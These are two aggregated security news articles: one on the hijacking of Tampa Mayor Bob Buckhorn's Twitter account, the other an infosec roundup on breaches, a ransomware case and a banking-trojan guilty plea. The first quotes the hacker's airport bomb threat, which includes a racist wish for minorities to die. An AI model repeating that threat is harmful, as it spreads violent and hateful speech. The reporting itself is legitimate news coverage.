Mayor Bob Buckhorn’s account is normally filled with pro-Tampa messages. He encourages developers to submit innovative ideas for urban expansion and promotes owner-occupied home repair programs. Early on Thursday morning, however, things went sideways. The mayor’s account was hacked to post messages, most of which were too vile to reproduce here.

The imposter’s tweets included racist and sexist tweets, images of pornography, and child sex abuse images tagging personalities in the gaming community. There was also this tweet:

[Screenshot of a tweet posted from the hijacked account; not reproduced here]

In another tweet, the hacker reportedly targeted Tampa’s airport with this message:

I have hidden a bomb in a package somewhere…Looking forward to seeing some minorities die.

Tampa City Hall was quick to correct the record, with communications director Ashley Bauman issuing the following statement:

Earlier this morning we noticed someone hacked Mayor Buckhorn’s twitter account, this was clearly not Mayor Buckhorn. Upon noticing the hack we immediately began investigating these reprehensible tweets.

We will work with our Tampa Police Department as well as all investigators to figure out how this breach was made. We urge residents to change their passwords and continue to alert officials when they see an unlikely change in account activity. We are working with law enforcement to investigate all threats made by this hack.

However, City Hall still spent five hours wresting control of the account back from the hacker. After working with Twitter, it finally gained access at 9am Eastern time on Thursday, at which point it was able to delete the offending tweets.

The first illegitimate tweet on Buckhorn’s account attributed the hack to three separate people on Twitter, at least two of whom operate online gaming servers. At least one of the three denied the claim outright.

The attacker also changed the account for a while to make it seem as though Salem, Oregon, resident Gunner Levy was responsible. Levy has been the victim of other impersonation attacks, including SWATting, before. Someone alerted police that he was going to attack a local school, he told reporters, adding:

This is all just over arguing online.

Most people seem to realise that the attack was a hack pretty quickly, thanks to the egregious nature of the tweets. What would be more worrying is if someone began issuing threats that looked credible.

How did the attacker get in? Experts rolled out the usual weaknesses, including poor passwords.

With that in mind, the use of passphrases or strong passwords with random characters, and the avoidance of words found in the dictionary, are all useful approaches to help protect your Twitter password. Better still is the use of 2FA, which Twitter supports.

The Tampa elections will be held on 5 March, but early voting begins today.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/vERzdqt6_VU/

Burger chain Wendy’s serves up settlement, NeverQuest hacker guilty, cloudy payroll users hacked and more

Roundup Last week, the security world saw Adobe take a do-over, Cisco clean up some bugs and the NCC head out to space.

Let’s kick off the week with some other happenings in the world of infosec.

Bamboo spills beans on hack attack

Cloud-based human-resources biz BambooHR has admitted that some companies using its Trax online payroll service were hacked, and sensitive private data, primarily names and full US social security numbers of employees, was exposed to miscreants. The software-as-a-service outfit told El Reg on Friday it was working with law enforcement to figure out what happened.

“The information of a handful of our Trax customers was compromised this past week, and we secured the information for these affected customers very quickly,” a Bamboo spokesperson said. “We are in contact with their legal teams, insurance companies, and the FBI to make sure our customers are safe and secure.”

One thing to note here: when Bamboo says “a handful” of customers were exposed, it’s not referring to the number of people, but rather companies that use the service. Those “customers” can in fact be businesses that manage the data of hundreds or thousands of individual employees. So even if only a few accounts were accessed we could still see a significant number of people exposed.

Also, Bamboo is being weirdly cagey about the details: it’s not clear if companies were hacked by poorly securing their Trax accounts, such as using weak passwords, or if the Trax backend itself was compromised, and only some customer records were taken before the intrusion was caught and stopped. Bamboo declined to confirm either way.

Wendy’s tosses $50m on the grill to settle breach case

Fast food chain Wendy’s says it has agreed to pay $50m to settle the class-action suit filed on behalf of customers whose card details were slurped in 2015 and 2016 when a malware infection was spreading through its cash registers.

“With this settlement, we have now reached agreements in principle to resolve all of the outstanding legal matters related to these criminal cyberattacks,” CEO Todd Penegor said of the deal.

“We look forward to putting this behind us so that we can continue to focus on growing the Wendy’s brand.”

While insurance will help to cover some of the settlement cash, Wendy’s says it will still have to shell out around $27.5m of its own money to cover the remainder of the payout.

The cash will go to the banks and financial institutions that had to deal with the stolen cards, and, as always, the lawyers who brought the case will also be able to collect a healthy payout from the $50m pile of cash.

NeverQuest hacker pleads guilty

A Russian man has admitted to using a banking trojan called NeverQuest to take millions of dollars from Americans.

Stanislav Lisov pleaded guilty to a single count of conspiracy to commit computer hacking and now faces five years behind bars.

Lisov, who was arrested in Spain in 2017 and extradited to the US a year later, admitted to infecting PCs with NeverQuest and using the resulting botnet to mass-harvest bank account credentials.

According to the DOJ, at its peak the botnet was harvesting “millions” of accounts for Lisov to access and drain.

How much is your Facebook account worth? A lousy £3

Your Facebook account won’t net the typical hacker even enough to purchase a decent cup of java.

This according to a report from MoneyGuru, which found that the going rate for a stolen account on the social network was a mere £3. By comparison, an AppleID account would fetch around £10.30 and Netflix credentials go for £8.20.

Even Instagram accounts were deemed more valuable than Facebook, with individual credentials going for £4.80 on average.

“There are few better ways to gain insight into someone’s life than their social media accounts,” says MoneyGuru.

“These details are frequently stolen to sell to companies with little scruples about targeted advertising. It’s also a fast track to identity theft as they can take control of your accounts, lock you out and cause serious reputational damage in a short space of time.”

Crikey! Aussie hospital gets 15,000 records ransomed

An Australian hospital says some 15,000 of its patient records are being held for ransom by hackers.

The Age says that Cabrini hospital in Malvern was hit by what it calls a “digital crime syndicate” (which seems like an odd way to describe a ransomware infection) and, despite caving in and paying the demanded cryptocurrency, it still hasn’t been able to get back all of the encrypted records.

This is where we point out that paying ransomware demands is not a good idea. Even when you comply, you’re more likely than not to still lose your data. Instead, make regular backups and be prepared to wipe and restore your devices if need be.

Microsofties rebel over military HoloLens project

A bit of unrest is brewing in Redmond over a controversial project Microsoft is planning with the US government.

A group called Microsoft Workers for Good is circulating an open letter to CEO Satya Nadella and president Brad Smith, asking that they reconsider a project called “IVAS” which uses the HoloLens technology to train soldiers in combat situations. In this case, the group argues, HoloLens is being used to make the soldiers more capable of killing, something they object to.

“We did not sign up to develop weapons,” the group declares, “and we demand a say in how our work is used.”

Hackers flogging Pakistani bank accounts

Researchers with Russian security firm Group-IB say they have spotted a massive cache of bank accounts from Pakistan being flogged on darknet markets.

The databases are said to be valued at around $3.5m in all and include more than 69,000 cards with PINs. The accounts are priced at $50 each, and nearly all appear to originate from one bank, Meezan.

“The scale, volume, frequency and connection to one institution contributes to the theory that the leak might be involved in a larger incident, potentially an advanced actor gaining access to card systems within Pakistan,” said researcher Dmitry Shestakov. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/infosec_roundup/